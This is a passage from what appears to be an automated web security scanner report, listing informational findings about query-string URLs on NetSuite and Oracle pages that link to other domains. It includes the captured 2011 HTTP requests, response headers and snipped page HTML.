<td style="background:#e4e3df; vertical-align:middle; text-align:center"><a href="http://www.microsoft.com/windows/Internet-explorer/default.aspx"><img src="/images/ielogo.jpg" alt="Download internet explorer 8 now" />
...[SNIP]...
<td style="background:#e4e3df; vertical-align:middle; text-align:center"><a href="http://www.mozilla.com/en-US/firefox/ie.html"><img src="/images/fflogo.jpg" alt="Download firefox now" />
...[SNIP]...
<td><a href="http://www.youtube.com/marykay" target="_blank"><img src="/images/icn_yt.jpg" />
...[SNIP]...
<td><a href="http://www.facebook.com/MaryKay" target="_blank"><img src="/images/icn_fb.jpg" />
...[SNIP]...
<li><a href='http://applications.marykayintouch.com/' class="footer">
INTOUCH</a>
...[SNIP]...
<li class="Leaf"><A class="Link" target="_blank" href="http://www.marykayfoundation.org">The Mary Kay Foundation</A>
...[SNIP]...

19.105. http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netsuite.com
Path:	/portal/seo-landing-page/ecommerce/ecommerce-2.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html?gclid=CMyov8D4iKsCFSBCgwodRnXLzA

The response contains the following link to another domain:

http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719

Request

GET /portal/seo-landing-page/ecommerce/ecommerce-2.html?gclid=CMyov8D4iKsCFSBCgwodRnXLzA HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=QT3hTm8p7D1Q2hhMSM3rQLFQvcw2J3TQShKJRpn1Yhv9FTy2DQVng1H0TCB1KJGCkCkpDxH4DCFJNC0Nj2667xXJTjLwhfB8YwwBpTkcx5GNPSrJxnLxrTJMV2nLTVxD!-982923961; NLShopperId=Mhd7aqh5AbdCXidV; NLVisitorId=Mhd7aqh5AbpCXgSl; NS_VER=2011.2.0

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4120
Content-Disposition: inline;filename="ecommerce-2.html"
NS_RTIMER_COMPOSITE: 234023608:73686F702D6A6176613030312E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=F
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:32:27 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...

<iframe src='http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'></iframe>
...[SNIP]...

19.106. http://www.oracle.com/openworld/register/packages/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/openworld/register/packages/index.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.oracle.com/openworld/register/packages/index.html?src=7013425&Act=226

The response contains the following links to other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://twitter.com/oracleopenworld
http://www.appscompanion.com/
http://www.chain-sys.com/
http://www.cisco.com/
http://www.csc.com/
http://www.dell.com/oracle
http://www.deloitte.com/
http://www.dnb.com/360
http://www.emc.com/
http://www.excel4apps.com/?source=openworld2011
http://www.facebook.com/OracleOpenWorld
http://www.infosys.com/oracle/pages/index.aspx
http://www.linkedin.com/groups?about=&gid=114605
http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js
http://www.oracleimg.com/us/assets/rightarrow-066625.gif
http://www.oracleimg.com/us/assets/sponsortabclosed.png
http://www.oracleimg.com/us/assets/w03-cisco-logo.gif
http://www.oracleimg.com/us/assets/w03-csc-logo.gif
http://www.oracleimg.com/us/assets/w03-dell-logo.gif
http://www.oracleimg.com/us/assets/w03-deloitte-logo.gif
http://www.oracleimg.com/us/assets/w03-emc2-logo.gif
http://www.oracleimg.com/us/assets/w03-infosys-logo.gif
http://www.oracleimg.com/us/assets/w03-intel-logo.gif
http://www.oracleimg.com/us/assets/w03-netapp-logo.gif
http://www.stepaheadsolution.com/index.php?option=com_content&view=article&id=49&Itemid=56
https://oracleus.wingateweb.com/portal/analytics/s_code.js
https://oracleus.wingateweb.com/portal/login.ww
https://oracleus.wingateweb.com/portal/newreg.ww?brand=comb&eve=dis&wt=di
https://oracleus.wingateweb.com/portal/newreg.ww?brand=jone&eve=ow&wt=oub
https://oracleus.wingateweb.com/portal/newreg.ww?brand=jone&eve=ow&wt=ow
https://oracleus.wingateweb.com/scheduler/eventcatalog/eventCatalog.do
https://oracleus.wingateweb.com/scheduler/exhibitorCatalog.do
https://oracleus.wingateweb.com/scheduler/login.jsp

Request

GET /openworld/register/packages/index.html?src=7013425&Act=226 HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/pls/www/go.lp?kw=&Src=7013425&Act=226&pcode=WWMK10042957MPP055&refer=http%3A//www.oracle.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1315342445639; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Findex.html; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahpf4%25253Aregister%252520now%252520for%252520oracle%252520openworld%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=299;ecid=35672222811585456,0:1)
Content-Length: 49483
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:54:07 GMT
Connection: close

<!DOCTYPE html>

<html id="top">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undefined";
var g_HttpRelativeWebRoot =
...[SNIP]...
</script>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<li><a href="https://oracleus.wingateweb.com/scheduler/exhibitorCatalog.do" target="_blank">Exhibitor Listing</a>
...[SNIP]...
<li><a href="https://oracleus.wingateweb.com/scheduler/exhibitorCatalog.do" target="_blank">Exhibitor Listing</a>
...[SNIP]...
<li><a href="http://twitter.com/oracleopenworld" title="Click to share this post on Twitter" target="_blank" class="u04twitterlink">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/OracleOpenWorld" target="_blank" class="u04facebooklink">Facebook</a>
...[SNIP]...
<li><a href="http://www.linkedin.com/groups?about=&gid=114605" target="_blank" class="u04linkedinlink">LinkedIn</a>
...[SNIP]...
<li><a href="https://oracleus.wingateweb.com/scheduler/eventcatalog/eventCatalog.do" target="_blank" class="u04tool7">Content Catalog</a>
...[SNIP]...
<li><a href="https://oracleus.wingateweb.com/scheduler/login.jsp" class="u04tool8" target="_blank">Schedule Builder</a>
...[SNIP]...
<li><a href="https://oracleus.wingateweb.com/portal/login.ww" target="_blank" class="u04tool6">My Account</a>
...[SNIP]...
<div class="w02w9"><a href="https://oracleus.wingateweb.com/portal/newreg.ww?brand=jone&eve=ow&wt=ow" target="_blank" title="register" onClick="var s=s_gi('oracleglobal,oraclecom,oracleopenworld'); s.linkTrackVars='eVar14,events'; s.linkTrackEvents='event7'; s.eVar14='OOW: RegPage: Register'; s.events='event7'; s.tl(this,'o','');" class="graphicbutton">Register<span>
...[SNIP]...
<div class="w02w9"><a href="https://oracleus.wingateweb.com/portal/newreg.ww?brand=jone&eve=ow&wt=ow" target="_blank" title="register" onClick="var s=s_gi('oracleglobal,oraclecom,oracleopenworld'); s.linkTrackVars='eVar14,events'; s.linkTrackEvents='event7'; s.eVar14='OOW: RegPage: Register'; s.events='event7'; s.tl(this,'o','');" class="graphicbutton">Register<span>
...[SNIP]...
<div class="w02w9"><a href="https://oracleus.wingateweb.com/portal/newreg.ww?brand=jone&eve=ow&wt=oub" target="_blank" title="register" onClick="var s=s_gi('oracleglobal,oraclecom,oracleopenworld'); s.linkTrackVars='eVar14,events'; s.linkTrackEvents='event7'; s.eVar14='OOW: RegPage: Register'; s.events='event7'; s.tl(this,'o','');" class="graphicbutton">Register<span>
...[SNIP]...
<div class="w02w9"><a href="https://oracleus.wingateweb.com/portal/newreg.ww?brand=comb&eve=dis&wt=di" target="_blank" title="register" onClick="var s=s_gi('oracleglobal,oraclecom,oracleopenworld'); s.linkTrackVars='eVar14,events'; s.linkTrackEvents='event22'; s.eVar14='OOW: RegPage: Discover Register'; s.events='event22'; s.tl(this,'o','');" class="graphicbutton">Register<span>
...[SNIP]...
<div class="w02w9"><a href="https://oracleus.wingateweb.com/portal/newreg.ww?brand=comb&eve=dis&wt=di" target="_blank" title="register" onClick="var s=s_gi('oracleglobal,oraclecom,oracleopenworld'); s.linkTrackVars='eVar14,events'; s.linkTrackEvents='event22'; s.eVar14='OOW: RegPage: Discover Register'; s.events='event22'; s.tl(this,'o','');" class="graphicbutton">Register<span>
...[SNIP]...
<div class="w03icon"><img src="http://www.oracleimg.com/us/assets/w03-deloitte-logo.gif" width="52" height="30" border="0" alt="Deloitte Sponsor" /></div>
...[SNIP]...
<p><a href="http://www.deloitte.com/" target="_blank"><em>
...[SNIP]...
<div class="w03icon"><img src="http://www.oracleimg.com/us/assets/w03-cisco-logo.gif" width="52" height="47" border="0" alt="Cisco Sponsor" /></div>
...[SNIP]...
<p><a href="http://www.cisco.com/" target="_blank"><em>
...[SNIP]...
<div class="w03icon"><img src="http://www.oracleimg.com/us/assets/w03-dell-logo.gif" width="52" height="62" border="0" alt="Dell Sponsor" /></div>
...[SNIP]...
<p><a href="http://www.dell.com/oracle" target="_blank"><em>
...[SNIP]...
<div class="w03icon"><img src="http://www.oracleimg.com/us/assets/w03-emc2-logo.gif" width="52" height="38" border="0" alt="EMC Sponsor" /></div>
...[SNIP]...
<p><a href="http://www.emc.com/" target="_blank"><em>
...[SNIP]...
<div class="w03icon"><img src="http://www.oracleimg.com/us/assets/w03-infosys-logo.gif" width="52" height="35" border="0" alt="InfoSys Sponsor" /></div>
...[SNIP]...
<p><a href="http://www.infosys.com/oracle/pages/index.aspx" target="_blank"><em>
...[SNIP]...
<div class="w03icon"><img src="http://www.oracleimg.com/us/assets/w03-intel-logo.gif" width="52" height="40" border="0" alt="Intel Sponsor" /></div>
...[SNIP]...
<div class="w03icon"><img src="http://www.oracleimg.com/us/assets/w03-csc-logo.gif" width="52" height="46" border="0" alt="CSC Sponsor" /></div>
...[SNIP]...
<p><a href="http://www.csc.com/" target="_blank"><em>
...[SNIP]...
<div class="w03icon"><img src="http://www.oracleimg.com/us/assets/w03-netapp-logo.gif" width="52" height="70" border="0" alt="NetApp Sponsor" /></div>
...[SNIP]...
<div class="w03z2"> <img src="http://www.oracleimg.com/us/assets/sponsortabclosed.png" /> </div>
...[SNIP]...
<span class="rightarrow"><img src="http://www.oracleimg.com/us/assets/rightarrow-066625.gif" /></span>
...[SNIP]...
<span class="rightarrow"><img src="http://www.oracleimg.com/us/assets/rightarrow-066625.gif" /></span>
...[SNIP]...
</ul>
<a href="https://oracleus.wingateweb.com/portal/newreg.ww?brand=jone&eve=ow&wt=ow" target="_blank" title="register" onclick="var s=s_gi('oracleglobal,oraclecom,oracleopenworld'); s.linkTrackVars='eVar14,events'; s.linkTrackEvents='event7'; s.eVar14='OOW: RegPage: Register'; s.events='event7'; s.tl(this,'o','');" class="l1">Register Now</a>
...[SNIP]...
</p> <a class="graphicbutton" href="https://oracleus.wingateweb.com/portal/newreg.ww?brand=jone&eve=ow&wt=ow" target="_blank" title="register" onclick="var s=s_gi('oracleglobal,oraclecom,oracleopenworld'); s.linkTrackVars='eVar14,events'; s.linkTrackEvents='event7'; s.eVar14='OOW: RegPage: Register'; s.events='event7'; s.tl(this,'o','');">Register<span>
...[SNIP]...
</p> <a class="graphicbutton" onClick="var s=s_gi('oracleglobal,oraclecom,oracleopenworld'); s.linkTrackVars='eVar14,events'; s.linkTrackEvents='event7'; s.eVar14='OOW: RegPage: Register'; s.events='event7'; s.tl(this,'o','');" title="register" target="_blank" href="https://oracleus.wingateweb.com/portal/newreg.ww?brand=jone&eve=ow&wt=ow">Register<span>
...[SNIP]...
</p> <a class="graphicbutton" onClick="var s=s_gi('oracleglobal,oraclecom,oracleopenworld'); s.linkTrackVars='eVar14,events'; s.linkTrackEvents='event7'; s.eVar14='OOW: RegPage: Register'; s.events='event7'; s.tl(this,'o','');" title="register" target="_blank" href="https://oracleus.wingateweb.com/portal/newreg.ww?brand=jone&eve=ow&wt=oub">Register<span>
...[SNIP]...
</p> <a class="graphicbutton" onClick="var s=s_gi('oracleglobal,oraclecom,oracleopenworld'); s.linkTrackVars='eVar14,events'; s.linkTrackEvents='event22'; s.eVar14='OOW: RegPage: Discover Register'; s.events='event22'; s.tl(this,'o','');" title="register" target="_blank" href="https://oracleus.wingateweb.com/portal/newreg.ww?brand=comb&eve=dis&wt=di">Register<span>
...[SNIP]...
</p> <a class="graphicbutton" onClick="var s=s_gi('oracleglobal,oraclecom,oracleopenworld'); s.linkTrackVars='eVar14,events'; s.linkTrackEvents='event22'; s.eVar14='OOW: RegPage: Discover Register'; s.events='event22'; s.tl(this,'o','');" title="register" target="_blank" href="https://oracleus.wingateweb.com/portal/newreg.ww?brand=comb&eve=dis&wt=di">Register<span>
...[SNIP]...
<div class="s05"><a href="http://www.deloitte.com/" target="_blank"><img height="64" width="278" border="0" alt="Deloitte, Marquee Sponsor" src="/us/assets/s05-sponsorimage.jpg" />
...[SNIP]...
<div class="s04w6"><a target="_blank" href="http://www.stepaheadsolution.com/index.php?option=com_content&view=article&id=49&Itemid=56"><img height="34" width="162" border="0" alt="STEP AHEAD Business Intelligence Solutions" src="/us/assets/s04-partnerspotlight.jpg" />
...[SNIP]...
<div class="s04w6"><a target="_blank" href="http://www.chain-sys.com/"><img height="34" width="162" border="0" alt="CHAIN-SYS Data Mgmt - the easy way for Oracle EBS/JDE and SAP" src="/ocom/groups/public/@ocom/documents/digitalasset/367627.gif" />
...[SNIP]...
<div class="s04w6"><a target="_blank" href="http://www.excel4apps.com/?source=openworld2011"><img height="47" width="143" border="0" alt="excel4apps Excel solutions for Oracle and SAP" src="/ocom/groups/public/@ocom/documents/digitalasset/367630.gif" />
...[SNIP]...
<div class="s04w6"><a target="_blank" href="http://www.appscompanion.com"><img height="53" width="179" border="0" alt="AppsCompanion" src="/ocom/groups/public/@ocom/documents/digitalasset/402599.gif" />
...[SNIP]...
<p>Nowent's AppsCompanion provides automation for Oracle 11i/R12 users. Generate conversion programs. Upload setups and transactions from Excel. Even generate setup documents. <a target="_blank" href="http://www.appscompanion.com">Download Free Trial</a>
...[SNIP]...
<div class="s04w6"><a target="_blank" href="http://www.dnb.com/360"><img height="64" width="118" border="0" alt="D&B" src="/ocom/groups/public/@ocom/documents/digitalasset/459699.gif" />
...[SNIP]...
<li><a href="https://oracleus.wingateweb.com/scheduler/eventcatalog/eventCatalog.do" target="_blank">Content Catalog</a>
...[SNIP]...
<li><a href="https://oracleus.wingateweb.com/portal/login.ww" target="_blank">My Account</a>
...[SNIP]...
<li><a href="https://oracleus.wingateweb.com/scheduler/login.jsp" target="_blank">Schedule Builder</a>
...[SNIP]...
<li><a href="http://twitter.com/oracleopenworld" target="_blank" class="u05twitterlink">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/OracleOpenWorld" target="_blank" class="u05facebooklink">Facebook</a>
...[SNIP]...
<li><a href="http://www.linkedin.com/groups?about=&gid=114605" target="_blank" class="u05linkedinlink">LinkedIn</a>
...[SNIP]...

<script type="text/javascript" src="https://oracleus.wingateweb.com/portal/analytics/s_code.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js"></script>
...[SNIP]...

19.107. http://www.oracle.com/technetwork/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/index.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.oracle.com/technetwork/index.html?ssSourceSiteId=ocomen

The response contains the following links to other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://java.com/download
http://java.net/
http://java.sun.com/javase/downloads/index.jsp
http://mysql.com/downloads
http://netbeans.org/downloads/index.html
http://netbeans.org/index.html
http://oraclecfo.com/
http://www.mysql.com/downloads/
http://www.oracleimg.com/us/11057362-oow-spotlight-397037.jpg
http://www.oracleimg.com/us/assets/dropdown-arrow-new.gif
http://www.oracleimg.com/us/assets/engineered-promo.gif
http://www.oracleimg.com/us/assets/exalogic-promo.jpg
http://www.oracleimg.com/us/assets/feed-icon-14x14.png
http://www.oracleimg.com/us/assets/metrics/ora_otn.js
http://www.oracleimg.com/us/assets/oracle-footer-tagline.gif
http://www.oracleimg.com/us/assets/oralogo-small.gif
https://oracle.6connex.com/portal/database/login

Request

GET /technetwork/index.html?ssSourceSiteId=ocomen HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343562818; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Findex.html%23; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41152695571452255,0:1)
Vary: Accept-Encoding
Content-Length: 200478
Date: Tue, 06 Sep 2011 16:12:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<a href='http://www.oracle.com/' onclick="navTrack('otn','en','header','logo');"><img src='http://www.oracleimg.com/us/assets/oralogo-small.gif' border='0' /></a>
...[SNIP]...
<a class="legalese" onmouseover="mvqMOv('panelDivOTN','img1');" onmouseout="mvqMOu('panelDivOTN');" href="#">United States<img style="MARGIN-LEFT: 4px;" id="img1" border="0" alt="Change Country, Oracle Worldwide Web Sites" src="http://www.oracleimg.com/us/assets/dropdown-arrow-new.gif" /></a>
...[SNIP]...
/index.html?ssSourceSiteId=otnen' class='legalese' onMouseOver="mvqMOv('panelDiv_comm','img2');" onMouseOut="mvqMOu('panelDiv_comm');" onclick="navTrack('otn','en','header','communities');">Communities<img src='http://www.oracleimg.com/us/assets/dropdown-arrow-new.gif' style='margin-left: 4px;' border='0' id='img2'></a>
...[SNIP]...
<a href='#' class='legalese' onMouseOver="mvqMOv('panelDiv_iam','img3');" onMouseOut="mvqMOu('panelDiv_iam');">I am a...<img src='http://www.oracleimg.com/us/assets/dropdown-arrow-new.gif' style='margin-left: 4px;' border='0' id='img3'></a>
...[SNIP]...
<div ><a href='http://oraclecfo.com' class='sngPst' onclick="navTrack('otn','en','header','chieffinancialofficer(cfo)');">Chief Financial Officer (CFO)</a>
...[SNIP]...
<a href='#' class='legalese' onMouseOver="mvqMOv('panelDiv_iwanto','img4');" onMouseOut="mvqMOu('panelDiv_iwanto');">I want to...<img src='http://www.oracleimg.com/us/assets/dropdown-arrow-new.gif' style='margin-left: 4px;' border='0' id='img4'></a>
...[SNIP]...
<a onclick='navTrack("ocom","en","hnav","productsandservices:spotlight:exalogic promo");' href='http://www.oracle.com/us/products/middleware/exalogic/index.html?ssSourceSiteId=otnen'><img src='http://www.oracleimg.com/us/assets/exalogic-promo.jpg' width='166' height='87' border='0' alt='Marvel' style='*padding-bottom:10px;padding-top:10px;'></a>
...[SNIP]...
<dd><a href="http://www.mysql.com/downloads/" onclick="navTrack('otn','en','hnav','downloads:database:mysqldownloads');">MySQL</a>
...[SNIP]...
<dd><a href="http://netbeans.org/downloads/index.html" onclick="navTrack('otn','en','hnav','downloads:developertools:netbeansidedownloads');">NetBeans IDE</a>
...[SNIP]...
<dd><a href='http://java.sun.com/javase/downloads/index.jsp' onclick='navTrack("ocom","en","hnav","downloads:populardownloads:javafordevelopersdownloads");'>Java for Developers</a>
...[SNIP]...
<dd><a href='http://java.com/download' onclick='navTrack("ocom","en","hnav","downloads:populardownloads:javaforyourcomputerdownloads");'>Java for Your Computer</a>
...[SNIP]...
<dd><a href='http://www.mysql.com/downloads/' onclick='navTrack("ocom","en","hnav","downloads:populardownloads:mysqldownloads");'>MySQL</a>
...[SNIP]...
<a onclick='navTrack("ocom","en","hnav","about:spotlight:engineered_promo");' href='http://www.oracle.com/us/corporate/features/engineered-173370.html?ssSourceSiteId=otnen'><img src='http://www.oracleimg.com/us/assets/engineered-promo.gif' width='166' height='87' border='0' alt='FPO'></a>
...[SNIP]...
<a onclick='navTrack("ocom","en","hnav","about:spotlight:OOWBanner");' href='http://www.oracle.com/go/?&Src=7013425&Act=236&pcode=WWMK10042957MPP055'><img src='http://www.oracleimg.com/us/11057362-oow-spotlight-397037.jpg' width='166' height='94' border='0' alt='OOW'></a>
...[SNIP]...
<li><a target="" onClick="navTrack('otn','en','hpelinks','javanet')" href="http://java.net/">Java.net<br />
...[SNIP]...
<li><a onClick="navTrack('otn','en','hpdl','mysql');" href="http://mysql.com/downloads">MySQL</a>
...[SNIP]...
<li><a onClick="navTrack('otn','en','hpdl','mysql');" href="http://netbeans.org/index.html">NetBeans IDE</a>
...[SNIP]...
<h3 class="post-title"><a onClick="navTrack('otn','en','hpnews','otnvdd');" href="https://oracle.6connex.com/portal/database/login">Virtual Developer Day: Hands-on Database Application Development (Sept. 13)</a>
...[SNIP]...
<a onclick="navTrack('otn','en','footer','Hardware and Software Engineered to Work Together');" href='/us/corporate/index.html'><img src='http://www.oracleimg.com/us/assets/oracle-footer-tagline.gif' border='0' alt='Hardware and Software Engineered to Work Together'/></a>
...[SNIP]...
<a href='/us/syndication/feeds/index.html' onclick="navTrack('otn','en','footer','rss');"> <img src='http://www.oracleimg.com/us/assets/feed-icon-14x14.png' alt='Oracle RSS Feeds' style='margin-bottom: 1px;' align='absmiddle' border='0' height='14' width='14'></a>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_otn.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

19.108. http://www.oracle.com/us/ciocentral/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/ciocentral/index.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.oracle.com/us/ciocentral/index.html?origref=http://www.oracle.com/index.html

The response contains the following links to other domains:

http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset/357455.png
http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset/357495.png
http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset/357512.gif
http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js
http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code_ocom.js
http://www.oracleimg.com/us/assets/feed-icon-14x14.png
http://www.oracleimg.com/us/ciocentral/oraclecio-hp-1-454562.jpg
http://www.oracleimg.com/us/ciocentral/oraclecio-hp-2-454563.jpg
http://www.oracleimg.com/us/ciocentral/oraclecio-hp-3-454564.jpg
http://www.oracleimg.com/us/ciocentral/search-right-420491.gif
http://www.oraclesurveys.com/se.ashx?s=251137450DEC3B1A

Request

GET /us/ciocentral/index.html?origref=http://www.oracle.com/index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/us/cio/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gpv_p24=no%20value; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_nr=1315343430587; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Findex.html; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.oracle.com%25252Findex.html%252523%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35988164901865103,0:1)
Content-Length: 15880
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:10:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta content="text/html;
...[SNIP]...
<a href="javascript:document.searchForm.submit()" onclick="javascript: return isNotNull(document.searchForm.q.value)"><img src="http://www.oracleimg.com/us/ciocentral/search-right-420491.gif "></a>
...[SNIP]...
<span id="prev"><img src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset/357455.png" alt="Previous" style="border-width: 0px;" /></span>
...[SNIP]...
<span id="next"><img src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset/357495.png" alt="Next" style="border-width: 0px;" /></span>
...[SNIP]...
<div class="OEitem"><a href="http://www.oraclesurveys.com/se.ashx?s=251137450DEC3B1A"><img src="http://www.oracleimg.com/us/ciocentral/oraclecio-hp-1-454562.jpg" alt="CIO Survey Banner" /></a>
...[SNIP]...
<a href="/us/ciocentral/res-videos-404509.html#cisco"><img src="http://www.oracleimg.com/us/ciocentral/oraclecio-hp-2-454563.jpg" alt="Cisco Systems" /></a>
...[SNIP]...
<a href="/us/ciocentral/news-359472.html"><img src="http://www.oracleimg.com/us/ciocentral/oraclecio-hp-3-454564.jpg" alt="info matters exalogic" /></a>
...[SNIP]...
<div id="footer">
   <img class="floatleft" src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset/357512.gif" alt="Software. Hardware. Complete." style="border-width:0px;" />
   <p>
...[SNIP]...
<a class="legalese" href="http://www.oracle.com/us/syndication/feeds/index.html" target="_blank"><img class="rssIcon" src="http://www.oracleimg.com/us/assets/feed-icon-14x14.png" alt="Oracle RSS Feeds" style="border-width:0px;" /></a>
...[SNIP]...

   <script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code_ocom.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

19.109. http://www.oracle.com/us/go/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/go/index.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.oracle.com/us/go/index.html?Src=7013425&Act=226&pcode=WWMK10042957MPP055

The response contains the following links to other domains:

http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js
http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code_ocom.js

Request

GET /us/go/index.html?Src=7013425&Act=226&pcode=WWMK10042957MPP055 HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
